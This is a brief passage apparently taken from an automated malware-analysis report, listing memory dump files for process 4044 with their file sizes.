                                  Filesize

                                  136KB

                                • memory/4044-149-0x000002976FFB0000-0x000002976FFC0000-memory.dmp

                                  Filesize

                                  64KB

                                • memory/4044-148-0x000002976D7D0000-0x000002976DB1A000-memory.dmp

                                  Filesize

                                  3.3MB